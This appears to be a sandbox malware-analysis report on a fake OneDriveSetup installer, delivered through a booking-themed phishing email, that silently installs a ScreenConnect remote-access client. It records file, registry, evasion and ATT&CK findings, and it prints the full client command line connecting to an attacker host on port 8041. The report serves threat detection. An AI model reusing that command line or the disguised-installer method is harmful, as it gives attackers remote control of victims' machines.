                      Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.Compression.dll
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsAuthenticationPackage.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\ScreenConnect.Windows.dll
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Core.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI436F.tmp
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Client.dll
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsCredentialProvider.dll
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\Downloads\14f3f776-391e-4342-bf6c-c60f47a6bfa4.tmp
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.dll
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsBackstageShell.exe
                      Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\ScreenConnect.InstallerActions.dll
                      Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI512D.tmp
                      Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.Compression.Cab.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (d241e538b9eb3f0a)
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935} DeviceTicket
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mmc.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe, Memory allocated: 18D0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe, Memory allocated: 3370000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe, Memory allocated: 3200000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe, Memory allocated: 69F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe, Memory allocated: 61A0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe, Memory allocated: 79F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe, Memory allocated: 89F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe, Memory allocated: 8C70000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe, Memory allocated: 9C70000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe, Memory allocated: 1FA0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe, Memory allocated: 21E0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe, Memory allocated: 2010000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, Memory allocated: 14F0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, Memory allocated: 1B0C0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, Memory allocated: 9D0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, Memory allocated: 1A780000 memory reserve | memory write watch
                      Source: C:\Windows\System32\mmc.exe, Memory allocated: 4C70000 memory reserve | memory write watch
                      Source: C:\Windows\System32\mmc.exe, Memory allocated: 4600000 memory commit | memory reserve | memory write watch
                      Source: C:\Windows\System32\mmc.exe, Memory allocated: 4EE0000 memory commit | memory reserve | memory write watch
                      Source: C:\Windows\System32\mmc.exe, Memory allocated: 4F20000 memory reserve | memory write watch
                      Source: C:\Windows\System32\mmc.exe, Memory allocated: 5030000 memory reserve | memory write watch
                      Source: C:\Windows\System32\svchost.exe, File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe, Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\mmc.exe, Window / User API: threadDelayed 700
                      Source: C:\Windows\SysWOW64\rundll32.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                      Source: C:\Windows\System32\msiexec.exe, Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsFileManager.exe
                      Source: C:\Windows\SysWOW64\rundll32.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.Compression.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\ScreenConnect.Windows.dll
                      Source: C:\Windows\System32\msiexec.exe, Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsAuthenticationPackage.dll
                      Source: C:\Windows\System32\msiexec.exe, Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Core.dll
                      Source: C:\Windows\SysWOW64\msiexec.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI436F.tmp
                      Source: C:\Windows\System32\msiexec.exe, Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Client.dll
                      Source: C:\Windows\System32\msiexec.exe, Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsCredentialProvider.dll
                      Source: C:\Windows\System32\msiexec.exe, Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.dll
                      Source: C:\Windows\System32\msiexec.exe, Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsBackstageShell.exe
                      Source: C:\Windows\SysWOW64\rundll32.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\ScreenConnect.InstallerActions.dll
                      Source: C:\Windows\System32\msiexec.exe, Dropped PE file which has not been started: C:\Windows\Installer\MSI512D.tmp
                      Source: C:\Windows\SysWOW64\rundll32.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.Compression.Cab.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                      Source: C:\Windows\System32\svchost.exe TID: 1008, Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe TID: 752, Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe TID: 2932, Thread sleep count: 49 > 30
                      Source: C:\Windows\System32\mmc.exe TID: 3492, Thread sleep count: 700 > 30
                      Source: C:\Windows\System32\svchost.exe, File opened: PhysicalDrive0
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, File Volume queried: C:\Windows\SysWOW64 FullSizeInformation
                      Source: C:\Windows\System32\svchost.exe, File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exe, File Volume queried: C:\Windows\System32 FullSizeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exe, File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exe, File Volume queried: C:\ FullSizeInformation
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, Process information queried: ProcessInformation
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe, Process token adjusted: Debug
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe, Process token adjusted: Debug
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe, Memory allocated: page read and write | page guard
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe, Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.4.4.9118\d241e538b9eb3f0a\ScreenConnect.ClientSetup.msi"
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (d241e538b9eb3f0a)\screenconnect.clientservice.exe" "?e=access&y=guest&h=bookinghqsupport.top&p=8041&s=8d8131d8-05a3-44ca-a0f5-2c7287519a41&k=bgiaaackaabsu0exaagaaaeaaqct6sszjydr%2fljmo5hpn8us4uyae1kfx0emr5mgd6wzfjdx5v16iauld7anubgtx0f3lf1idcdy6kpnajjaqdv62l1xetkhzqejflahnrynki4igddx3udlj%2bq5ccf18ayniy9sxt2xekatdpx%2bheawzxumc46podu5uafzskoj3zhdqfkucobiyw%2f65wl6minahyngepubztnu97itnow%2bn22p2gzqzziqkfuuwabhjclpnbqhlnuukec1vr2lxx3ezdrdkmlntp6lmt39dgw8ssiitizom5omfnv7u8h8la819gdb3bqba%2fsr%2fj57hzmjtk78yzxu2%2fz9ypp9dzdb&c=onedrivesetup%20fb&c=&c=&c=&c=&c=&c=&c="
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe, Queries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe, Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe, Queries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsym.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe, Queries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsym.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe, Queries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsymsb.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe, Queries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsymsb.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe, Queries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsymsl.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe, Queries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsymsl.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe, Queries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe, Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe, Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe, Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
                      Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation
                      Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
                      Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol VolumeInformation
                      Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exe, Queries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\tmp.edb VolumeInformation
                      Source: C:\Windows\System32\svchost.exe, Queries volume information: C: VolumeInformation
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exe, Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\msiexec.exe, Queries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe, Queries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe, Queries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe, Queries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe, Queries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, Queries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, Queries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, Queries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, Queries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, Queries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      Source: C:\Windows\System32\svchost.exe, Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: C:\Windows\System32\msiexec.exe, Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
                      Source: C:\Windows\System32\svchost.exe, WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: Yara match, File source: C:\Users\user\Downloads\eda2c7bf-7eeb-4af6-a518-8725894275d2.tmp, type: DROPPED
                      Source: Yara match, File source: C:\Users\user\Downloads\Unconfirmed 111805.crdownload, type: DROPPED
                      Source: Yara match, File source: 00000013.00000000.1809633017.0000000000446000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000013.00000002.1834609850.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000001D.00000000.1894571066.0000000000D42000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000013.00000002.1838178371.00000000079F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000013.00000002.1827940305.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: C:\Windows\Temp\~DFD365F17729FDCDF2.TMP, type: DROPPED
                      Source: Yara match, File source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                      Source: Yara match, File source: C:\Windows\Temp\~DFCA3227996840FADD.TMP, type: DROPPED
                      Source: Yara match, File source: C:\Config.Msi\564c4a.rbs, type: DROPPED
                      Source: Yara match, File source: C:\Windows\Installer\MSI4F17.tmp, type: DROPPED
                      Source: Yara match, File source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, type: DROPPED
                      Source: Yara match, File source: 0000001D.00000002.2416415621.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000001E.00000002.2418379726.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | 1 Replication Through Removable Media | 41 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Disable or Modify Tools | OS Credential Dumping | 11 Peripheral Device Discovery | Remote Services | 1 Clipboard Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 Component Object Model Hijacking | 1 Extra Window Memory Injection | 1 DLL Side-Loading | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | 2 Windows Service | 1 Component Object Model Hijacking | 1 File Deletion | Security Account Manager | 55 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 21 Browser Extensions | 2 Windows Service | 1 Extra Window Memory Injection | NTDS | 5 Security Software Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 11 Process Injection | 22 Masquerading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 4 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 71 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 71 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Rundll32 | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msg | 0% | Virustotal | | Browse |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Client.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe | 0% | ReversingLabs | | |
| C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Core.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsAuthenticationPackage.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | | |
| C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | | |
| C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsCredentialProvider.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\MSI436F.tmp | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.Compression.Cab.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.Compression.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.WindowsInstaller.dll | 0% | ReversingLabs | | |
